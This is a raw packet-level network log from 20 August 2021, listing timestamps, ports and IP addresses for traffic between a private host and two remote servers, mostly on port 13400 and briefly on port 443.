Aug 20, 2021 17:09:46.306819916 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.306834936 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.307001114 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.307075024 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.307152987 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.307316065 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.307476997 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.360645056 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.360677004 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.360912085 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.361093998 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.361651897 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.361675024 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.361735106 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.361752033 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.361767054 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.361891985 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.361932993 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.361938953 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.361958981 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.361996889 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.362210035 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.362258911 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.362397909 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.362549067 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.362603903 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.362698078 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.362807989 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.362807989 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.362925053 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.363046885 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.364842892 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.416095972 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.416285038 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.416305065 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.416338921 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.416405916 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.416436911 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.416728973 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.416822910 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.416868925 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.416883945 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.416949034 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.417138100 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.417152882 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.417253017 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.417275906 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.417315960 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.417467117 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.417542934 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.417928934 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.417944908 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.418103933 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.418167114 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.418179035 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.418253899 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.418260098 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.418478012 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.418560982 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.418775082 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.418811083 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.418848038 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.418911934 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.418946028 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.420814037 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.421118975 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.471359968 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.471390009 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.471539974 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.471720934 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.471826077 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.471838951 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.471863985 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.471951008 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.472012997 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.472172022 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.472193956 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.472213984 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.472263098 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.472301006 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.472534895 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.472556114 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.472577095 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.472589970 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.472610950 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.472702980 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.472713947 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.472752094 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.472784042 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.472846031 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.472919941 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.472948074 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.472951889 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.473109007 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.473191977 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.473195076 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.473263025 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.473387957 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.473414898 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.473483086 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.473505974 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.473769903 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.473813057 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.473834038 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.473854065 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.473881006 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.473898888 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.473905087 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.473921061 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.473949909 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.473963022 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.474095106 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.474220991 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.474340916 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.474560022 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.474581957 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.474781990 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.474803925 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.475856066 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.475989103 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.476288080 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.476717949 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.476756096 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.479345083 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.479619026 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.483887911 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.483925104 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.484025002 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.484040976 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.484131098 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.484149933 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.484167099 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.484237909 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.484287024 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.526998043 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.527017117 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.527031898 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.527046919 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.527064085 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.527080059 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.527103901 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.527192116 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.527214050 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.527256012 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.527324915 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.527364969 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.527457952 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.527475119 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.527491093 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.527633905 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.527652025 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.527671099 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.527688026 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.527723074 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.527784109 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.527792931 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.527882099 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.527894974 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.527956963 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.528003931 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.528117895 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.528151035 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.528289080 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.528357983 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.528429985 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.528537035 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.528723955 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.528743029 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.528788090 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.528848886 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.528908968 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.528980970 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.529073000 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.529094934 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.529169083 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.529181957 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.529252052 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.529371977 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.529401064 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.529824018 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.529865026 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.529958963 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.530025959 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.530107975 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.530436039 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.530579090 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.530672073 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.530740976 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.530776978 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.530839920 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.530855894 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.531059980 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.531076908 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.531090021 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.531106949 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.531141996 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.534476042 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.534517050 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.534535885 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.534553051 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.534637928 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.534722090 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.539732933 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.539777040 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.540457964 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.540488005 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.540596008 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.540616989 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.540652037 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.540672064 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.540693045 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.540713072 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.540739059 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.540761948 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.540782928 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.540802956 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.540823936 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.544322968 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.544343948 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.544352055 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.544363976 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.544373035 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.544384003 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.544399023 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.544413090 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.544424057 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.544435978 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.544447899 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.544461012 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.582698107 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.582741022 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.582752943 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.582767963 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.582797050 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.582813025 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.583161116 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.583183050 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.583225012 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.583338976 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.583412886 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.583586931 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.583602905 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.583703041 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.583723068 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.583787918 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.583914042 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.584171057 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.584235907 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.584259987 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.584573030 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.584732056 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.584877014 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.585007906 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.585027933 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.585108995 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.585244894 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.585263014 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.585551977 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.585572004 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.585918903 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.585937023 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.586013079 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.586072922 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.586249113 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.586587906 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.586654902 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.586775064 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.586801052 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.586879969 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.588105917 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.588125944 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.588202953 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.588222027 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.633493900 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.634041071 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.636464119 CEST	49712	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.689019918 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.689182997 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.693229914 CEST	13400	49712	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.693345070 CEST	49712	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.694029093 CEST	49712	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.751374960 CEST	13400	49712	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.752007008 CEST	49712	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.835751057 CEST	13400	49712	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.848005056 CEST	13400	49712	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.901664019 CEST	49712	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:47.536072016 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.552778006 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.552931070 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.554260969 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.570986986 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.574951887 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.575001955 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.575229883 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.584708929 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.601535082 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.601747990 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.631784916 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.648528099 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.676086903 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.676110029 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.676126957 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.676150084 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.676167011 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.676212072 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.676238060 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.676256895 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.676265001 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.676269054 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.676338911 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.676621914 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.676660061 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.676681042 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.676703930 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.676702976 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.676784039 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.677402973 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.677437067 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.677459955 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.677481890 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.677494049 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.677561998 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.678227901 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.678282976 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.678308964 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.678334951 CEST	443	49713	162.159.135.233	192.168.2.3
